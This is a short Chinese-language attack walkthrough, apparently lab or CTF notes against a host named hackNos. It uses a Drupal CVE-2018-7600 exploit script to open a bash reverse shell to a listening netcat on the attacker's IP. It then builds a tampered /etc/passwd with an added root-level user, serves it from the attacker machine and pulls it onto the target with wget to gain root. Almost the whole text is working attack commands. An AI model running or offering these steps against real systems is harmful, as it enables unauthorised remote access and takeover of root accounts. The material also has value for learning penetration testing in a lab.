进入kali root权限
-
反弹一个shell
攻击机监听:
nc -lvnp 10000
目的主机:
python3 drupa7-CVE-2018-7600.py http://210.26.72.210/drupal/ -c "bash -c 'bash -i >& /dev/tcp/210.26.72.230/10000 0>&1'" -
进入目标主机的命令行界面(Shell 环境)
www-data@hackNos:/var/www/html/drupal$ -
目标主机的命令行界面:
cat passwd
cat /etc/passwd
攻击机:
openssl passwd -1 -salt wyr 密码 生成密文
cd /home
mkdir wyr
cd wyr
touch passwd
vim passwd(copy 目标主机文件/etc/passwd 最后一行加上wyr:$1$wyr$A20hHuKW8gs4c6LVmb270/:0:0:root:/root:/bin/bash)
python3 -m http.server 9001 -
目标主机的命令行界面:
cd /etc
wget http://210.26.72.230:9001/passwd -O /etc/passwd
wget http://210.26.72.230:9001/passwd -O /var/www/html/drupal
渗透测试中获取基础反向 shell 后(如通过 nc、bash 等方式),通常会立即执行这条命令,将 shell 升级为全交互模式:
python3 -c 'import pty;pty.spawn("/bin/bash")' -
su wyr